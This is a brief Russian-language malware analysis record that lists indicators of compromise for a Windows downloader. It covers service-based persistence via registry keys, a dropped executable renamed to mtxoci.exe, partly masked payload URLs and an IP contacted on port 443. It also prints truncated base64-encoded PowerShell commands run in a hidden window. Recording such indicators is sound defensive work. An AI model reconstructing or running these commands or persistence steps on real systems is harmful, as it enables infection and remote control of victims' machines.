Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mtxoci] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mtxoci] 'ImagePath' = '"%WINDIR%\SysWOW64\hidserv\mtxoci.exe"'
- 'mtxoci' "%WINDIR%\SysWOW64\hidserv\mtxoci.exe"
- 'mtxoci' %WINDIR%\SysWOW64\hidserv\mtxoci.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...
- %HOMEPATH%\60.exe
- %WINDIR%\syswow64\hidserv\mtxoci.exe
- %HOMEPATH%\60.exe в %WINDIR%\syswow64\hidserv\mtxoci.exe
- '17#.73.0.98':443
- http://ri###ahl.com/wp-includes/Z8eS6748/
- http://www.gv##tz.com/4LH419348/
- http://in###mal.com/eazylot.com/zy/
- http://17#.#3.0.98:443/ThB4zg2NBgBiI/cDuB1SRJ5Nw1/ via 17#.73.0.98
- DNS ASK ri###ahl.com
- DNS ASK gv##tz.com
- DNS ASK in###mal.com
- '%HOMEPATH%\60.exe'
- '%WINDIR%\syswow64\hidserv\mtxoci.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...' (со скрытым окном)